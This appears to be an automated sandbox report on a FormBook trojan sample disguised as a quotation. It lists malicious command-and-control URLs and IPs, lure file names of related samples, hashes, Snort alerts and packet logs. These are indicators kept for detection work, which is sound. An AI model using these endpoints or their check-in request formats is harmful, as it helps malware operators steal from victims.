http://www.jiyu-kobo.co.jp/s-c	quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com_	quotation New Order I5117.exe, 00000001.00000003.279107622.0000000006497000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279149208.000000000649B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.indianasheriffs.biz/Accident_Lawyers.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdE	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comv-s	quotation New Order I5117.exe, 00000001.00000003.279705644.0000000006496000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279897743.000000000649F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indianasheriffs.biz/song_lyrics.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm292	cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.30.32.154	www.zahad-riedel.com	Germany	48324	DE-WEBGOwwwwebgodeDE	true
37.123.118.150	www.jypmore.quest	United Kingdom	13213	UK2NET-ASGB	true
208.91.197.39	www.indianasheriffs.biz	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
15.197.142.173	thetanheroes.com	United States	7430	TANDEMUS	true
162.241.2.141	eduardoleonsilva.com	United States	26337	OIS1US	true
136.143.191.204	zhs.zohosites.com	United States	2639	ZOHO-ASUS	false
162.144.34.39	www.myveguiolcusbyopappgroup.com	United States	46606	UNIFIEDLAYER-AS-1US	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	549969
Start date:	10.01.2022
Start time:	08:53:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	quotation New Order I5117.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@10/8
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 22.9% (good quality ratio 20.6%) Quality average: 68.9% Quality standard deviation: 32.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 99 Number of non-executed functions: 167
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.4.86 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com Execution Graph export aborted for target cmd.exe, PID 6500 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:54:08	API Interceptor	1x Sleep call for process: quotation New Order I5117.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37.123.118.150	Request for Quotation.exe	Get hash	malicious	Browse	www.teentykarm.quest/b80i/?_vT=J+u8pU8DtF7Gr7X8/NxHruIy2NemieD/+U15INgVnzwgvTjQFCGm9Nk6zLTO93ax4Vp7&oVP=LnoxnFL8v2gXG
	Ocxwgtrrxrnbohidoxavjksseafwerivek.exe	Get hash	malicious	Browse	www.wolnfinger.quest/fm6i/?vP=gtcP8ZKxwjO4ijC0&7nEDMf=y9qH5wBELfx87OK5CQzsxOzZ29rB5j3A3oyQRrvkfsCW4VM3kBL255ExUaKoq1TWzZ5F
	P.O 20222021.xlsx	Get hash	malicious	Browse	www.formalvar.quest/nv6i/?6lbTn=p492zbdx7Q1X6dEeBjtkWoGID5ZAPsH3u218h9hW5o2tkFUHiq/MY5ISFlNXvXPELFHFyw==&yj=8p-DJXlhSBm
	0rder_pdf.exe	Get hash	malicious	Browse	www.gebietinroep.quest/mawd/?5jQ=C0HbONgOlYpEIISMBbRBclVltZoLUEF6G6bre/CBS2VyZjLChORb6Uy+Q1Z1QYEYtuC/&j48p3N=SBZDOzghsZdL
	Shipping invoice2320214010.exe	Get hash	malicious	Browse	www.druvajtteet.quest/posg/?7nO=oz5+CxtoOfiBNVNT3nlhM5SHg75lhlRq3pLrjYDSzxlogZeXHEIonjxfB7qGRoso8czu&fDK=MlxT2Vgh5DzDYhA
	7084_00_WPG_20211716.exe	Get hash	malicious	Browse	www.olegknig.quest/ch24/?2dRDM4=Z+5+Usz2PL4QCgn2w5iBvv8ulNgyUqFMQ+h/OqH7Jvf0ErGvI0BDmH7vnhZM5cQfSIpX&Z82X=B2MD
	PO 211213-0221A.exe	Get hash	malicious	Browse	www.kastyelie.xyz/kz21/?c4p0=mqi/Io61GR3DNI2WEoh72SPCwDXalr0TRvVbHC2c3Nn9w16mGByEn9MdhEJ3UbJCzpOm&gD=5jcXpLnp1xMH2
	lBpxJoOTRL.exe	Get hash	malicious	Browse	www.bodevolidu.quest/yrcy/?8phLk=V5AGORS+yX12cH3TH36knvdu3XeUF+Ak2BcxxR+ER6y4H3OwjDr83/AQN410vdE6TCqY&zPODYf=6lIDg8lhZTn
	Commercial invoice & Packing List_pdf.exe	Get hash	malicious	Browse	www.lasoigdreasu.xyz/b62n/?l0G8pf=9rptvdr0Q8&EN6=RZjgbbqiX548Lcsqy5LR2GT2GJZGEb+jcGOF2q/kUsFw0EgTkvMJ3W6jto0CxMFZoW3A
	12K5quBhfF.exe	Get hash	malicious	Browse	www.bodevolidu.quest/yrcy/?-ZV0=Tloh&TBZD=V5AGORS+yX12cH3TH36knvdu3XeUF+Ak2BcxxR+ER6y4H3OwjDr83/AQN41ewt06XAiY
	VERG#U0130 #U00d6DEME FATURASI 10 ARALIK 2021 CUMA,pdf.exe	Get hash	malicious	Browse	www.rkcoom.quest/bqt2/?3f-DaH=1brToJyxAnR&B8C=eEOhKKwjXUK9aaPnhz+Bo0YbGF7Z7/8nVL1eT0pVhV+jhuQQmuu1xCCndboPryY6UA3Y
	17425996.exe	Get hash	malicious	Browse	www.atinokvanta.quest/wkgp/?iV=npCMCl+RregmTw6cx8+byq65zg7h1u/lJ5mbqhiD7E8vI14+TRkcHQFH1Zs3yeqswACN&3fzPNj=ETktZP
	2xJxrfegtt.exe	Get hash	malicious	Browse	www.wrochtthurl.quest/cfn8/?q4tTMH=2dEtFbahOZb&C48HDTS0=9BGGmrkVWCi5MD1EAQU4N2yXzXcYEQw1VilgRdiYwrDDLDR2+ctswR5qQyHGD+hAlTD1
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	www.odonofally.quest/m07f/?rH=pu2qMXFyXGXYsUUvu9gRt9IkxUBpQ5DfR3+FUI5XCn7mqTuuEkOu+z6wTfCBZiEp5vbdqw==&1bNL=ujK0A0Axe
	iEChGuO0Wy.exe	Get hash	malicious	Browse	www.lheteclase.quest/mwev/?6l=6lcXz&kVO8=Hr37bjVgQCIqWbhofNywmYlrDuyalavdxPQKiZOl6LKtAEcob9PGpHgNdoyuf/a5lqcY
	ZDSWrJbftX.exe	Get hash	malicious	Browse	www.odonofally.quest/m07f/?-Zp=DVUdfr9&d4t=pu2qMXF3XBXcsEYjs9gRt9IkxUBpQ5DfR3mVILlWGH7nqiCoD0fio3CyQ6uXdyAaysGt
	Purchase Order.exe	Get hash	malicious	Browse	www.oporbagehi.quest/ecus/?q6A=KpN4wErd7wd6llqzpYzMQWPswpobIZ1kAW5Qs8tqKzxMxpJ7Q8ocWbT+8Il2D+ON0vCBGHfeYw==&-ZWD=3fipz
	Invoice.exe	Get hash	malicious	Browse	www.clararsjajno.quest/ecus/?Hv=wM9HhNol3VknZtCX6tFZg6ZVgns5sLPgkVIgHov8M2vp803Y2cQPt23A/H16uEy8E84t&ob6Xz2=8p6tXJ40DbjTU
	Poh Tiong Trading - products list.exe	Get hash	malicious	Browse	www.rosekarat.quest/bus9/?mTntav=1OiTMBer/8Qy7QTgfSECv4pVwSEZ+osxlE6B2rezvGZeQy+B+LCmJjQOSE5tEFRZhsdu&pl2t=RvjDFFkxh
	yMznKPLZVR.exe	Get hash	malicious	Browse	www.itesparii.quest/cf27/?vBU4I=0HUEZtoYm0GYae4COdqitc8upDPP3Inx26xpnuP3wJqUfjWK7pkzNisFZqQDtS0oSc9t&MDK=Ytxxgj0HUvuL

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
zhs.zohosites.com	BL_CI_PL.exe	Get hash	malicious	Browse	136.143.191.204
	Zr26f1rL6r.exe	Get hash	malicious	Browse	136.143.191.204
	AWB_SHIPPING DOCS.exe	Get hash	malicious	Browse	136.143.191.204
	#Uc81c#Ud488 #Uce74#Ud0c8#Ub85c#Uadf823.exe	Get hash	malicious	Browse	136.143.191.204
	Request For Quotation.exe	Get hash	malicious	Browse	136.143.191.204
	Order.exe	Get hash	malicious	Browse	136.143.191.204
	REQUIREMENT.exe	Get hash	malicious	Browse	204.141.43.204
	cat#U00e1logo de productos2021.exe	Get hash	malicious	Browse	204.141.43.204
	RPM.xlsx	Get hash	malicious	Browse	204.141.43.204
	009283774652673_pdf.exe	Get hash	malicious	Browse	204.141.42.73
	v86Jk19LUb.exe	Get hash	malicious	Browse	163.53.93.240
	RFQ_00701521.exe	Get hash	malicious	Browse	204.141.42.73
	IMAGE20210427001922654.exe	Get hash	malicious	Browse	204.141.42.73

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UK2NET-ASGB	Request for Quotation.exe	Get hash	malicious	Browse	37.123.118.150
	Ocxwgtrrxrnbohidoxavjksseafwerivek.exe	Get hash	malicious	Browse	37.123.118.150
	P.O 20222021.xlsx	Get hash	malicious	Browse	37.123.118.150
	owari.arm7	Get hash	malicious	Browse	77.92.90.53
	0rder_pdf.exe	Get hash	malicious	Browse	37.123.118.150
	erRVQhhJO4	Get hash	malicious	Browse	77.92.65.85
	Shipping invoice2320214010.exe	Get hash	malicious	Browse	37.123.118.150
	RvWKZZXqch	Get hash	malicious	Browse	77.92.90.58
	qdo8TC8wxP	Get hash	malicious	Browse	77.92.90.91
	7084_00_WPG_20211716.exe	Get hash	malicious	Browse	37.123.118.150
	PO 211213-0221A.exe	Get hash	malicious	Browse	37.123.118.150
	lBpxJoOTRL.exe	Get hash	malicious	Browse	37.123.118.150
	Commercial invoice & Packing List_pdf.exe	Get hash	malicious	Browse	37.123.118.150
	12K5quBhfF.exe	Get hash	malicious	Browse	37.123.118.150
	VERG#U0130 #U00d6DEME FATURASI 10 ARALIK 2021 CUMA,pdf.exe	Get hash	malicious	Browse	37.123.118.150
	17425996.exe	Get hash	malicious	Browse	37.123.118.150
	fsiB8A5aeM	Get hash	malicious	Browse	83.170.120.182
	2xJxrfegtt.exe	Get hash	malicious	Browse	37.123.118.150
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	37.123.118.150
	dxEOMYaOtV.exe	Get hash	malicious	Browse	109.123.118.63
DE-WEBGOwwwwebgodeDE	Txbu8gCsuV.exe	Get hash	malicious	Browse	185.30.32.33
	J18tG6Sqhb.exe	Get hash	malicious	Browse	185.30.32.51
	IKpep4Zn5S.exe	Get hash	malicious	Browse	185.30.32.16
	uX24M5IH33.exe	Get hash	malicious	Browse	185.30.32.44
	Quotation.exe	Get hash	malicious	Browse	185.30.32.26
	Invoice copy and Payment request.xlsx	Get hash	malicious	Browse	185.30.32.203
	https://dj.4zido.de/i/612BRNn/	Get hash	malicious	Browse	185.30.32.12

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\quotation New Order I5117.exe.log Download File
Process:	C:\Users\user\Desktop\quotation New Order I5117.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.340178659145498
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4bE4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4l:MIHK5HKXE1qHbHKnYHKhQnoPtHoxHhA9
MD5:	200C45B4371C42E1EC65243C1288751B
SHA1:	D381B575CBD94379873AA43DB07ED18BC6150C1A
SHA-256:	953799E8B658D0797E82466EB482E238F9F73326F5B91D0503D3591DB58ED236
SHA-512:	AAE09F52FAB534CDAC85BBD0A976BC01EDB7C958A0C1FB9C78BC76C82A24ACFBA7741001DB75ECED65309BA3799FCB526EBF9DA74CC3AAE0DB689CA0FF6EE892
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e08

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.3690900890058195
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	quotation New Order I5117.exe
File size:	733184
MD5:	a45506feaa8bc01b90ecc3204bc45b6e
SHA1:	04abf27e6e718aef274dd5cbbc0184334e84469e
SHA256:	9f5649294d8a9d4cc583e6bbcb11d8287e02f5221d3f7be4109048271f1112c2
SHA512:	15898fdfd025f1fb6e4bcd15327f51e6aaebd3f520dff5a8e6b2597b61572fa4fd5fc5edce32e5bf022c7093fb88db75eccf626fe6bb73c267210283a3757359
SSDEEP:	12288:El1WpAAYWD4Kh8wtDTmilHq1QD1FeOxVtVykEaBX63TO60x7ZT8U9t:El4pADWD4eFtDTmitq1QpFptV3B/x7ZH
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a................. ...........?... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4b3fbe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61DBCC0C [Mon Jan 10 06:02:52 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
js 00007F1FE0D71F06h
push FFFFFFD7h
push esi
mov bh, C7h
call 00007F2004F79040h
out dx, al
into
mov ebp, 7C0FAFC1h
cmc
sub al, dh
xchg dword ptr [edi+13h], eax
inc esi
xor byte ptr [eax-02B96AFFh], ch
fcomp dword ptr [eax-08509680h]
inc esp
mov esi, dword ptr [ecx-410000A5h]
xlatb
pop esp
mov dword ptr [edx], esp
adc dword ptr [eax-678E6C95h], edx
std
mov es, word ptr [ebx+79h]
cmpsb
and dword ptr [eax], ecx
mov ah, 49h
bound esp, dword ptr [B340F61Eh]
inc eax
rcl byte ptr [ecx+5Ah], 0000005Eh
stosb

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb3f70	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb6000	0x668	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb3f2c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb1fc4	0xb2000	False	0.769680751843	data	7.38331082072	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.sdata	0xb4000	0x1e8	0x200	False	0.857421875	data	6.63844624893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xb6000	0x668	0x800	False	0.34423828125	data	3.54787318779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xb60a0	0x3dc	data
RT_MANIFEST	0xb647c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright P4 Tecnologia e Desenvolvimento Humano Ltda. 2006
Assembly Version	1.0.0.0
InternalName	Arr.exe
FileVersion	1.0.0.0
CompanyName	P4 Tecnologia e Desenvolvimento Humano Ltda.
LegalTrademarks
Comments
ProductName	CsDO.CodeGenerator
ProductVersion	1.0.0.0
FileDescription	CsDO.CodeGenerator
OriginalFilename	Arr.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/10/22-08:55:23.302857	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.2.3	185.30.32.154
01/10/22-08:55:23.302857	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.2.3	185.30.32.154
01/10/22-08:55:23.302857	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.2.3	185.30.32.154
01/10/22-08:55:28.423782	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49818	37.123.118.150	192.168.2.3
01/10/22-08:55:38.802405	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.2.3	208.91.197.39
01/10/22-08:55:38.802405	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.2.3	208.91.197.39
01/10/22-08:55:38.802405	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.2.3	208.91.197.39
01/10/22-08:55:44.692189	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.2.3	162.241.2.141
01/10/22-08:55:44.692189	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.2.3	162.241.2.141
01/10/22-08:55:44.692189	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.2.3	162.241.2.141
01/10/22-08:55:50.098131	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49822	15.197.142.173	192.168.2.3
01/10/22-08:55:55.443574	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.2.3	136.143.191.204
01/10/22-08:55:55.443574	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.2.3	136.143.191.204
01/10/22-08:55:55.443574	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.2.3	136.143.191.204
01/10/22-08:56:06.624401	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49825	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2022 08:55:23.278533936 CET	49805	80	192.168.2.3	185.30.32.154
Jan 10, 2022 08:55:23.302304029 CET	80	49805	185.30.32.154	192.168.2.3
Jan 10, 2022 08:55:23.302583933 CET	49805	80	192.168.2.3	185.30.32.154
Jan 10, 2022 08:55:23.302856922 CET	49805	80	192.168.2.3	185.30.32.154
Jan 10, 2022 08:55:23.326271057 CET	80	49805	185.30.32.154	192.168.2.3
Jan 10, 2022 08:55:23.326754093 CET	80	49805	185.30.32.154	192.168.2.3
Jan 10, 2022 08:55:23.326777935 CET	80	49805	185.30.32.154	192.168.2.3
Jan 10, 2022 08:55:23.327651978 CET	49805	80	192.168.2.3	185.30.32.154
Jan 10, 2022 08:55:23.327811956 CET	49805	80	192.168.2.3	185.30.32.154
Jan 10, 2022 08:55:23.351382017 CET	80	49805	185.30.32.154	192.168.2.3
Jan 10, 2022 08:55:28.365963936 CET	49818	80	192.168.2.3	37.123.118.150
Jan 10, 2022 08:55:28.394812107 CET	80	49818	37.123.118.150	192.168.2.3
Jan 10, 2022 08:55:28.394922018 CET	49818	80	192.168.2.3	37.123.118.150
Jan 10, 2022 08:55:28.395068884 CET	49818	80	192.168.2.3	37.123.118.150
Jan 10, 2022 08:55:28.423749924 CET	80	49818	37.123.118.150	192.168.2.3
Jan 10, 2022 08:55:28.423782110 CET	80	49818	37.123.118.150	192.168.2.3
Jan 10, 2022 08:55:28.423798084 CET	80	49818	37.123.118.150	192.168.2.3
Jan 10, 2022 08:55:28.423948050 CET	49818	80	192.168.2.3	37.123.118.150
Jan 10, 2022 08:55:28.424027920 CET	49818	80	192.168.2.3	37.123.118.150
Jan 10, 2022 08:55:28.452704906 CET	80	49818	37.123.118.150	192.168.2.3
Jan 10, 2022 08:55:38.660166979 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:38.802145958 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:38.802251101 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:38.802405119 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:38.991600990 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.013601065 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.013655901 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.013694048 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.013732910 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.013772011 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.013813019 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.013827085 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.013851881 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.013885975 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.056818962 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.129139900 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.155929089 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.155971050 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.156028986 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.156121016 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.156158924 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.156189919 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.197104931 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.199035883 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.199090958 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.199198961 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.298279047 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.298352957 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.298408031 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.298428059 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.298461914 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.298527002 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.306611061 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.339273930 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.339298964 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.339405060 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.339436054 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:39.448981047 CET	80	49820	208.91.197.39	192.168.2.3
Jan 10, 2022 08:55:39.449112892 CET	49820	80	192.168.2.3	208.91.197.39
Jan 10, 2022 08:55:44.552217007 CET	49821	80	192.168.2.3	162.241.2.141
Jan 10, 2022 08:55:44.691884041 CET	80	49821	162.241.2.141	192.168.2.3
Jan 10, 2022 08:55:44.692168951 CET	49821	80	192.168.2.3	162.241.2.141
Jan 10, 2022 08:55:44.692188978 CET	49821	80	192.168.2.3	162.241.2.141
Jan 10, 2022 08:55:44.831773043 CET	80	49821	162.241.2.141	192.168.2.3
Jan 10, 2022 08:55:44.838823080 CET	80	49821	162.241.2.141	192.168.2.3
Jan 10, 2022 08:55:44.838856936 CET	80	49821	162.241.2.141	192.168.2.3
Jan 10, 2022 08:55:44.839117050 CET	49821	80	192.168.2.3	162.241.2.141
Jan 10, 2022 08:55:44.839137077 CET	49821	80	192.168.2.3	162.241.2.141
Jan 10, 2022 08:55:44.978739023 CET	80	49821	162.241.2.141	192.168.2.3
Jan 10, 2022 08:55:49.882581949 CET	49822	80	192.168.2.3	15.197.142.173
Jan 10, 2022 08:55:49.900295019 CET	80	49822	15.197.142.173	192.168.2.3
Jan 10, 2022 08:55:49.900512934 CET	49822	80	192.168.2.3	15.197.142.173
Jan 10, 2022 08:55:49.900691032 CET	49822	80	192.168.2.3	15.197.142.173
Jan 10, 2022 08:55:49.918528080 CET	80	49822	15.197.142.173	192.168.2.3
